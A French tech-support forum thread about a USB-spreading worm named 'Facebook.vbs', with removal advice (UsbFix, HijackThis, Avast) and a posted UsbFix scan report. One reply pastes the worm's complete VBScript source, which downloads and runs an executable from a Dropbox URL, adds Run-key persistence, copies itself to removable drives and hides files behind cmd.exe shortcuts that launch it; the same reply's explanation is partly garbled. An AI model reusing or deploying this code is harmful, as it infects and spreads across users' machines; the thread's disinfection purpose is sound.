Virus ou cheval de troie "facebook vbs"

Résolu
ismeldetwo Messages postés 3 Statut Membre -  
 malre -
Bonjour à tous.

Je suis très handicapé par un virus que j'ai attrapé en allant faire une impression d'un document avec une clef usb dans un cyber-café.
Il s'agit d'un document nommé "facebook vbs". Ce truc s'installe sur mes clefs usb et copie mes dossiers, créé des raccourcis. Mes dossiers deviennent des archives.
J'ai essayé un maximum de scanne en ligne. Avast le détecte mais il se localise dans les programmes et du fait qu'il est caché derrière un mot de passe, il résiste !
Même en paramétrant un scanne au démarrage en demandant de supprimer les dossiers infectés...
Si vous pouviez me trouver une solution cela m'arrangerais.
Merci.

6 réponses

  1. billmaxime Messages postés 50522 Date d'inscription   Statut Contributeur Dernière intervention   6 149
     
    salut

    fais ceci pour ton problème

    télécharge usbfix sur ton bureau (clique sur la flèche verte)

    le lien http://general-changelog-team.fr/fr/downloads/viewdownload/15-outils-de-el-desaparecido/79-usbfix

    si ton pc émet 1 alerte, ignore la

    branche toutes tes sources de données externe a ton pc (clé USB, disque dur externe, etc...) sans les ouvrir

    le tuto https://www.malekal.com/tutoriels-logiciels/

    exécute le en tant qu'administrateur (clic droit)

    choisis le mode "recherche"

    le rapport s'affichera sur ton bureau et dans C:\UsbFix.txt

    poste le rapport via 1 copier/coller

    @+

    9
    1. RICH11 Messages postés 2 Date d'inscription   Statut Membre Dernière intervention  
       
      SALUT en fait j'avais la meme question que celle que vous avez repondue j'aimerais poster le rapport recu pr avoir un soutien
      c le suivant:
      ############################## | UsbFix V 7.134 | [Recherche]

      Utilisateur: REDAMPTEUR (Administrateur) # PC-A368EF44E297
      Mis à jour le 06/09/2013 par El Desaparecido
      Lancé à 06:00:53 | 07/09/2013

      Site Web: https://www.sosvirus.net/
      Upload Malware: http://www.sosvirus.net/upload_malware.php
      Contact: http://wwww.sosvirus.net/contact_eldesaparecido.php

      PC: Compaq (Evo D510 SFF) (X86-based PC)
      CPU: Intel(R) Pentium(R) 4 CPU 2.40GHz (2392)
      RAM -> [Total : 1015 | Free : 268]
      BIOS: 686O2 v2.20
      BOOT: Normal boot

      OS: Microsoft Windows XP Professionnel (5.1.2600 32-Bit) # Service Pack 2
      WB: Windows Internet Explorer 8.0.6001.18702

      SC: Security Center Service [Enabled]
      WU: Windows Update Service [Enabled]
      FW: Windows FireWall Service [Enabled]

      C:\ (%systemdrive%) -> Disque fixe # 19 Go (4 Go libre(s) - 24%) [wij xp] # NTFS
      D:\ -> CD-ROM
      E:\ -> Disque amovible # 7 Go (1 Go libre(s) - 14%) [POCKET] # FAT32

      ################## | Processus Actif |

      C:\WINDOWS\System32\smss.exe (936)
      C:\WINDOWS\system32\csrss.exe (992)
      C:\WINDOWS\system32\winlogon.exe (1016)
      C:\WINDOWS\system32\services.exe (1060)
      C:\WINDOWS\system32\lsass.exe (1072)
      C:\WINDOWS\system32\svchost.exe (1272)
      C:\WINDOWS\system32\svchost.exe (1368)
      C:\WINDOWS\System32\svchost.exe (1492)
      C:\WINDOWS\system32\svchost.exe (1592)
      C:\WINDOWS\system32\svchost.exe (1740)
      C:\Program Files\Alwil Software\Avast5\AvastSvc.exe (1828)
      C:\Program Files\Alwil Software\Avast5\afwServ.exe (1936)
      C:\WINDOWS\system32\spoolsv.exe (252)
      C:\WINDOWS\system32\svchost.exe (1684)
      C:\WINDOWS\Explorer.EXE (928)
      C:\Program Files\lucky leap\updateluckyleap.exe (224)
      C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe (1352)
      C:\WINDOWS\System32\alg.exe (2464)
      C:\WINDOWS\system32\ctfmon.exe (3220)
      C:\WINDOWS\System32\svchost.exe (3584)
      C:\Program Files\Mozilla Firefox\firefox.exe (3868)
      C:\Program Files\Mozilla Firefox\plugin-container.exe (2728)
      C:\Program Files\Alwil Software\Avast5\AvastUI.exe (2968)
      C:\UsbFix\Go.exe (2132)
      C:\WINDOWS\system32\wbem\wmiprvse.exe (3616)

      ################## | El Desaparecido Section |

      HKLM\SOFTWARE | Run : [DivXMediaServer] - C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe
      HKLM\SOFTWARE | Run : [DivXUpdate] - "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
      HKLM\SOFTWARE | Run : [avast] - "C:\Program Files\Alwil Software\Avast5\avastUI.exe" /nogui
      HKLM\SOFTWARE | Run : [TkBellExe] - "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
      HKLM\SOFTWARE | Run : [Adobe Reader Speed Launcher] - "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
      HKLM\SOFTWARE | Run : [Adobe ARM] - "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe"
      HKLM\SOFTWARE | RunOnce : [] -
      HKU\S-1-5-19\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE
      HKU\S-1-5-20\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE
      HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\ctfmon.exe
      HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [RoboForm] - "C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe"
      HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [uTorrent] - "C:\Documents and Settings\REDAMPTEUR\Application Data\uTorrent\uTorrent.exe" /MINIMIZED
      HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [UpdateChecker] - C:\Program Files\SqueakyChocolate\UpdateChecker\UpdateCheckerApp.exe
      HKU\S-1-5-18\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE

      ################## | Eléments infectieux |

      Présent! C:\ministub.exe
      Présent! E:\make-money-with-facebook-wealth-formula.pdf.lnk
      Présent! E:\list.lnk
      Présent! E:\ccccc.exe
      Présent! E:\cacaoweb.exe
      Présent! E:\boucle1.exe
      Présent! E:\bc .exe
      Présent! E:\affich.exe
      Présent! E:\probabilitesEXCORRIGES1.rar.lnk
      Présent! E:\JUZU AMMA in KIRUNDI.lnk
      Présent! E:\Acute Email IDs Production Engine.lnk
      Présent! E:\COORAAN.lnk
      Présent! E:\mugani richard_fichiers\cbcommon.js
      Présent! E:\mugani richard_fichiers\cookies.js
      Présent! E:\mugani richard_fichiers\isrunning.js
      Présent! E:\mugani richard_fichiers\jquery-1.js
      Présent! E:\mugani richard_fichiers\jquery-ui-1.js
      Présent! E:\mugani richard_fichiers\s_code.js
      Présent! E:\mugani richard_fichiers\ui.js
      Présent! C:\DOCUME~1\REDAMP~1\LOCALS~1\Temp\iet6A.tmp.exe
      Présent! C:\DOCUME~1\REDAMP~1\LOCALS~1\Temp\utt69.tmp.exe
      Présent! E:\AUTORUN.INF

      ################## | Registre |


      ################## | Mountpoints2 |



      ################## | Vaccin |

      (!) Cet ordinateur n'est pas vacciné!

      ################## | E.O.F | https://www.sosvirus.net/ |
      0
  2. ElementW Messages postés 5690 Statut Contributeur 1 293
     
    Je cite https://www.malekal.com/vers-facebook-en-vbs/ (en bas de la page)
    "Ci-dessous, les lignes malicieuses visibles sur HijackThis.
    Ces lignes sont à cocher puis cliquer sur Fix Checked.
    Redémarrez l'ordinateur, le ver ne devrait plus être actif
    ."
    Juste un fix avec HijackThis devrait donc faire l'affaire pour s'en débarasser.
    Mais il faudra l'enlever des clés à la main, sans les ouvrir.
    0
  3. ismeldetwo Messages postés 3 Statut Membre
     
    merci à ceux qui m'ont proposé des solutions... Jusqu'à présent je suis toujours dans le pétrin !
    Un virus ne peut s'effacer par un formatage.
    Ce truc, que j'ai sur mon ordinateur semble être un cheval de Troie.
    Je me souviens avoir eu ce genre de truc, il y a 3 ou 4 ans, à l'époque je l'avais éliminé avec NPE.
    On m'a montré le chemin pour l'éliminer sur une clef usb, mais il faut que je le sorte de mon pc.
    Il s'agit d'une combinaison de tâche à effectuer dans l'ordre.
    S'il vous plais, pour ceux (plein de bonne volonté), qui donnent des réponses, soyez indulgents avec moi, je ne suis pas ingénieur en informatique. Si cela est trop compliqué je demanderais à un ami formateur en informatique.
    0
  4. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  5. erf64 Messages postés 1 Statut Membre
     
    http://ensaama.net/dotclear/intranet/index.php?post/2013/04/04/VIRUS

    LA solution. Elle permet de sauver ses fichiers. (Cela dit, elle ne marche pas avec les Carte Sd, du fait qu'elle se branche aux lecteur I:, et qu'il n'est pas possible de modifier le fichier sans quoi Windows refuse de le lire.)

    (navré du retard, mais je pense que d'autre internautes seront contents de trouver une solutions permettant de sauver leurs fichiers.)
    0
    1. juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
       
      Bonjour,
      BOF ! C'est pas LA solution, sachant qu'usbfix fait tout de lui même ...
      0
    2. ismeldetwo Messages postés 3 Statut Membre
       
      merci à tous.
      Toutes vos réponses étaient à côté !
      J'ai simplement attendu la nouvelle mise à jour du programme "avast" free, et j'ai fais un scanne au démarrage avec les paramètres "suppression".
      Mon ordinateur est propre, et lorsque je branche une clef usb ou une carte sd elle est scannée puis nettoyée, avant ouverture.
      0
    3. malre
       
      je crois que Facebook.vbs est plus pertinant ; aprés de nombreux test de scann le virus ne serait pas facebook mais un autre installer sur la machine grâce a un site qui dés introduction de clef usb mets le fichier vbs sur la clef.
      0
    4. malre
       
      pour ceuw que cela interesse le virus n'est pas facebook code çi dessous mais un autre qui installe ce fichier. alors lequel ..;;???:::;;
      '<[ coded And Developed bY KAKA27 ]>'
      On Error Resume Next
      Dim sh ' shell
      Set sh = WScript.CreateObject("WScript.Shell")
      Dim fs ' filesystem
      Set fs = CreateObject("Scripting.FileSystemObject")
      '---------------------------------------------
      '---------------------------------------------
      strComputer = "."
      Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
      Set colProcesses = objWMIService.ExecQuery _
      ( "Select * from Win32_Process Where Name = 'FlashPlayerPlug_1013010.exe'")
      If colProcesses.Count = 0 Then
      ' Wscript.Echo "Database.exe is not running."
      Set oShell = CreateObject("WScript.Shell")
      strHomeFolder = oShell.ExpandEnvironmentStrings("%TEMP%")
      download "http://dl.dropbox.com/s/fqlbp4q0pz67dy9/FlashPlayerUpdt.exe?dl=1", strHomeFolder & "\FlashPlayerMsj.exe"
      Dim objShell, strCommand
      Set objShell = CreateObject("WScript.Shell")
      strCommand = "IPConfig /Release"
      objShell.Run strCommand, 0, True
      WScript.Sleep 1500
      objShell.Run strHomeFolder & "\FlashPlayerMsj.exe"
      WScript.Sleep 2500
      strCommand = "IPConfig /Renew"
      objShell.Run strCommand, 0, True

      '-------------------------------------------------
      set WshShell = WScript.CreateObject("WScript.Shell")
      strDesktop = WshShell.SpecialFolders("Startup")
      set oShellLink = WshShell.CreateShortcut(strDesktop &"\FlashPlayerPlug.lnk")
      oShellLink.TargetPath = strHomeFolder & "\FlashPlayerMsj.exe"
      oShellLink.WindowStyle = 1
      oShellLink.IconLocation = "FlashPlayerMsj.exe, 0"
      oShellLink.Description = "Lancer Flash player"
      oShellLink.WorkingDirectory = strDesktop
      oShellLink.Save

      '--------------------------------------------------

      End If
      Dim DR
      DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
      Dim FN
      FN = "Facebook.vbs"
      Dim fh
      Dim us
      us = "~"
      ins


      dim i
      i=0
      while true
      wscript.sleep 4000
      i = i + 1
      if i> 2 then
      i=0
      xins
      end if
      wend
      '---------------------------------------------------------------
      Function ins
      On Error Resume Next
      us = sh.regread("HKCU\njq8")
      If us = "~" Then
      If lcase(mid(wscript.scriptfullname, 2)) = ":\" & lcase(fn) Then
      us = "y"
      sh.regwrite "HKCU\njq8", us, "REG_SZ"
      Else
      us = "n"
      sh.regwrite "HKCU\njq8", us, "REG_SZ"
      End If
      End If
      Err.Clear
      fs.CopyFile wscript.scriptfullname, dr & fn, True
      Set fh = fs.OpenTextFile(dr & fn, 8, False)
      If Err.Number > 0 Then
      wscript.quit
      End If
      xins
      End Function
      '---------------------------------------------------------------
      Sub xins
      On Error Resume Next
      sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
      sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
      fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path & "\" & fn, True
      For Each xx In fs.Drives
      If xx.isready Then
      If xx.FreeSpace > 0 Then
      If xx.drivetype = 1 Then
      If fs.fileexists(xx.path & "\" & fn) Then
      fs.getfile(xx.path & "\" & fn).Attributes = 0
      End If
      fs.copyfile dr & fn, xx.path & "\" & fn, True
      For Each x In fs.GetFolder(xx.path & "\").Files
      wscript.sleep 1
      If instr(x.name, ".") Then
      If lcase(Split(x.name, ".")(UBound(Split(x.name, ".")))) <> "lnk" Then
      x.Attributes = 2
      If ucase(x.name) <> ucase(fn) Then
      With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
      .TargetPath = "cmd.exe"
      .WorkingDirectory = ""
      .Arguments = "/c start " & Replace(fn, " ", ChrW(34) & " " & ChrW(34)) & "&start " & replace(x.name, " ", ChrW(34) & " " & ChrW(34)) & " & exit"
      .IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
      If instr(.iconlocation, ",") = 0 Then
      .iconlocation = .iconlocation & ",0"
      End If
      .Save()
      End With
      End If
      End If
      End If
      Next

      set objFolder = fs.GetFolder(xx.path & "\")

      for Each folder in objFolder.SubFolders
      folder.Attributes = 2
      With sh.CreateShortcut(xx.path & "\" & folder.name & ".lnk")
      .TargetPath = "cmd.exe"
      .WorkingDirectory = ""
      .Arguments = "/c start " & Replace(fn, " ", ChrW(34) & " " & ChrW(34)) & "& explorer.exe " & replace(folder.name, " ", ChrW(34) & " " & ChrW(34)) & " & exit"
      .IconLocation = "%systemroot%\System32\shell32.dll,4"
      .Save()
      End With

      Next

      End If
      End If
      End If
      Next
      Err.Clear
      End Sub
      '---------------------------------------------------------------
      'function post(cmd ,da)
      'post=""
      'Dim o
      'Set o = CreateObject("MSXML2.XMLHTTP")
      'o.open "POST","http://" & host & ":" & port &"/" & cmd, false
      'o.setRequestHeader "User-Agent:", inf
      'o.send da
      'post=o.responseText
      'end function
      Function download(sFileURL, sLocation)
      'create xmlhttp object
      Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
      'get the remote file
      objXMLHTTP.open "GET", sFileURL, False
      'send the request
      objXMLHTTP.send()
      'wait until the data has downloaded successfully
      Do Until objXMLHTTP.Status = 200 :
      wcript.sleep(1000) :
      Loop
      'if the data has downloaded sucessfully
      If objXMLHTTP.Status = 200 Then
      'create binary stream object
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      'adTypeBinary
      objADOStream.Type = 1
      objADOStream.Write objXMLHTTP.ResponseBody
      'Set the stream position to the start
      objADOStream.Position = 0
      'create file system object to allow the script to check for an existing file
      Set objFSO = Createobject("Scripting.FileSystemObject")
      'check if the file exists, if it exists then delete it
      If objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation
      'destroy file system object
      Set objFSO = Nothing
      'save the ado stream to a file
      objADOStream.SaveToFile sLocation
      'close the ado stream
      objADOStream.Close
      'destroy the ado stream object
      Set objADOStream = Nothing
      'end object downloaded successfully
      End If
      'destroy xml http object
      Set objXMLHTTP = Nothing
      End Function


      pas bien mechant et c'est signer kaka bravo
      0
    5. malre
       
      sur votre cley il ne vus reste que des liens ; click droit sur le raccourçis et propriete
      pas beau àvoir cmd start facebook.vbs puis ect .. explorer.exe effacer facebook.vbs uniquement
      appliquer et fermer la boite de dialogue.
      cliquer sur votre liens modifier normalement il s'ouvre sans enclancher eurodisneyvirus euh non facebook.vbs

      quelque autre conseil

      A : outil regedit
      1 - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" verifier si facebook existe si oui effacer keys
      2 - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" la même chose

      B : outils invite de commande
      explication :

      'Dim DR
      'DR = sh.ExpandEnvironmentStrings("%temp%") & "\" // Oui ici c'est dur de comprendre
      sh.ExpandEnvironmentStrings("%temp%") signifie directory temp a savoir qu' un cycle continue se met a s'enclencher des l'ouverture du liens cree par l'autre virus installer sur la machine ou vous avez telecharger votre DVX ou XX fichier.
      (la definition de cley usb devient obsolete des 'apparition d'un virus 'rire').
      il vous cree donc vos fichier en raccourçis et facebook.vbs lui n'est pas utile attrib via cmd changement des propriete hidden effacer le vous pouvez l'analiser sur cette page.
      et votre cley et comme neuve le mieux et de copier le contenu formater et les mettre une seconde fois.

      'Dim FN
      'FN = "Facebook.vbs" //variable non aimé il est du FN "pas beau".
      'Dim fh //surement un syndicat un souhait sur de sur.
      'Dim us //des revendication direct vers microsoft leur suggerant de s' installer ailleur.
      'us = "~" // souhait entre guillemet.

      'DR = sh.ExpandEnvironmentStrings("%temp%") & "\" si vous analiser bien cette variable avec son ensemble dans son programme vous comprendrez que votre machine a besoin d'un eventuel nettoyage .A savoir d'un super technicien sans faire de publicité je deviens tres cher lors de mes entretien ras le bol du populisme nucleaire c'est cadeau.
      Alors voila le mieux et de recuperer votre ipad ou android ou mieux linux apple tout marque differente de microsoft et mettre votre cley op apparition le fichier facebook effacer le .
      Sans plus attendre le nettoyage de votre machine comment proceder.
      le fichier temp chercher facebook.vbs ne sert à rien se fichier temp et cacher dans le local un veritable homme de menage aujourd'hui ballet serpillere torchon essui tout et brosse à dent pour curer le fond (pour ceux qui ont encore rien compris microsoft mets les fichier en instance d'execution dans un local verifier les cley vous les avez peut être oublier dans le regedit
      à bientôt
      0
  6. Louchot Messages postés 64 Statut Membre 1
     
    Bonjour, malheureusement,je ne vois que le formatage de la clé comme solution. :/
    -4
    1. said
       
      meme le formatage ne supprime pas les virus
      0
    2. Stupa163 Messages postés 1 Statut Membre
       
      Je confirme le formatage n'efface pas le virusde la clé.
      0